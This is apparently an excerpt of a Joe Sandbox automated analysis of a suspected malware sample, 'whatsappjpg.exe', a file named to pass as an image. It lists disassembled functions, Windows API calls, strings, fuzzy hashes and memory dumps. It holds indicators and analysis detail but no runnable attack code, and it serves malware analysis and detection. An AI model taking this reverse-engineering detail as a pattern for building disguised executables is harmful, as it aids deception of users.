Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: e0fbceb2114e9abc89c61ef25d156eb7acc43ea2741118eddc539df022ec75b6
Instruction ID: 6bbe31101158ed697117799215e52ff0bd2f9d85eb69b818a49c661f2cf41376
Opcode Fuzzy Hash: e0fbceb2114e9abc89c61ef25d156eb7acc43ea2741118eddc539df022ec75b6
Instruction Fuzzy Hash: BCE08630841204BBDB00AFA0CD49DEE3B78EF11340F10443AF540BB0D1E7F89580975A

Function 00404179 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
Instruction ID: 304cb8fb4d97a3357204857f1077e8b7844848a30fb901da7665e9cff7ac5a83
Opcode Fuzzy Hash: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
Instruction Fuzzy Hash: A1C09B717443017BEE308B509D49F1777546794B40F144439B344F50D4C774E451D61D

Function 00404162 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,?,00403F8E), ref: 00404170

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09

Function 0040330D Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D

Function 0040414F Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403F27), ref: 00404159

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
Instruction ID: 866da2961ca677aab693f91c7c1a68d27da85f1a7500f820b7212f7e549623fc
Opcode Fuzzy Hash: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
Instruction Fuzzy Hash: 62A00276544101ABCB115B50EF48D057B62BBA47517518575B1455003486715461EF69

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014E6

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 4ce028c416631f4879f61a6c47eaa424c852bb073f15e560c5dd11f99f423e06
Instruction ID: 218267b357b67079b54de8dffa8c027c75f66e7c1ef01c1e874d3fe206bc0dcd
Opcode Fuzzy Hash: 4ce028c416631f4879f61a6c47eaa424c852bb073f15e560c5dd11f99f423e06
Instruction Fuzzy Hash: A3D0C9B7B181009BE750EFB9AE8985B73A8E7513297604C73D942F20A1D578D8028A79

Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,?), ref: 10001225

Memory Dump Source

Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

Non-executed Functions

Function 00404B0E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B26
GetDlgItem.USER32(?,00000408), ref: 00404B31
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
LoadBitmapW.USER32(0000006E), ref: 00404B8E
SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
DeleteObject.GDI32(00000000), ref: 00404C04
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
ShowWindow.USER32(?,00000005), ref: 00404D5E
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
ImageList_Destroy.COMCTL32(?), ref: 00404F2E
GlobalFree.KERNEL32(?), ref: 00404F3E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
SendMessageW.USER32(?,00001102,?,?), ref: 00405060
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
InvalidateRect.USER32(?,00000000,?), ref: 0040508F
ShowWindow.USER32(?,00000000), ref: 004050DD
GetDlgItem.USER32(?,000003FE), ref: 004050E8
ShowWindow.USER32(00000000), ref: 004050EF

Strings

, xrefs: 004050C7
M, xrefs: 00404CB8
N, xrefs: 00404D99

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
Opcode Fuzzy Hash: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58

Function 004045C8 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 269stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404617
SetWindowTextW.USER32(00000000,?), ref: 00404641
SHBrowseForFolderW.SHELL32(?), ref: 004046F2
CoTaskMemFree.OLE32(00000000), ref: 004046FD
lstrcmpiW.KERNEL32(Call,004226D0,00000000,?,?), ref: 0040472F
lstrcatW.KERNEL32(?,Call), ref: 0040473B
SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D

Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB

Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\whatsappjpg.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 004061DF
Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\whatsappjpg.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 004061F3
Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 00406206

GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF

Strings

Call, xrefs: 00404729, 0040472E, 00404739
A, xrefs: 004046EB
C:\Users\user\Uploadable\normallnnens, xrefs: 00404718
kS, xrefs: 004045CE

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$C:\Users\user\Uploadable\normallnnens$Call$kS
API String ID: 2246997448-3545763026
Opcode ID: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
Opcode Fuzzy Hash: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69

Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407474,?,?,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD

Strings

C:\Users\user\Uploadable\normallnnens, xrefs: 004020F5

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\Uploadable\normallnnens
API String ID: 542301482-3974840194
Opcode ID: 0ecf81e3720b8fa1d97477eddaf9048000be678ddf3c5f5c56140a49ea83b6a4
Instruction ID: c11495a377249a79f2c0f90d15cc2262a1b8c0356f549485b3d6f64f05c33611
Opcode Fuzzy Hash: 0ecf81e3720b8fa1d97477eddaf9048000be678ddf3c5f5c56140a49ea83b6a4
Instruction Fuzzy Hash: 51416F75A00104BFCB00DFA8C988EAE7BB6EF48314B20456AF905EB2D1CB79ED41CB55

Function 0040276E Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277D

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 4cbdbd8e282f3210afb702b0731cfa06ea0a4afed203f093be5a44e6b438530a
Instruction ID: 660448b4c8776a587482eabd0d7c95c139f1dfbade13b447c4bb41c6a72f42af
Opcode Fuzzy Hash: 4cbdbd8e282f3210afb702b0731cfa06ea0a4afed203f093be5a44e6b438530a
Instruction Fuzzy Hash: 7EF082B1614114DBDB00DFA5DD499AEB378FF15314F60097BF111F31D0D6B459409B2A

Function 004042CA Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 00404368
GetDlgItem.USER32(?,000003E8), ref: 0040437C
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404399
GetSysColor.USER32(?), ref: 004043AA
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
lstrlenW.KERNEL32(?), ref: 004043CB
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
GetDlgItem.USER32(?,0000040A), ref: 00404446
SendMessageW.USER32(00000000), ref: 0040444D
GetDlgItem.USER32(?,000003E8), ref: 00404478
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
SetCursor.USER32(00000000), ref: 004044CC
ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,?), ref: 004044E1
LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
SetCursor.USER32(00000000), ref: 004044F0
SendMessageW.USER32(00000111,?,00000000), ref: 0040451F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531

Strings

AB@, xrefs: 004044D6
Call, xrefs: 004044A7
N, xrefs: 00404466
open, xrefs: 004044D9
kS, xrefs: 00404426

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: AB@$Call$N$open$kS
API String ID: 3615053054-866231313
Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9

Function 00405C06 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAA,?,?,?,00405922,?,00000000,000000F1,?), ref: 00405C16
CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,?,00405DAA,?,?,?,00405922,?,00000000,000000F1,?), ref: 00405C3A
GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43

Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
wsprintfA.USER32 ref: 00405C7E
GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
GlobalFree.KERNEL32(00000000), ref: 00405D6F
CloseHandle.KERNEL32(00000000), ref: 00405D76

Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\whatsappjpg.exe,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A

Strings

[Rename], xrefs: 00405CE8, 00405CFA
peB, xrefs: 00405C55
p]B, xrefs: 00405C0B
%ls=%ls, xrefs: 00405C74
NUL, xrefs: 00405C10

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %ls=%ls$NUL$[Rename]$p]B$peB
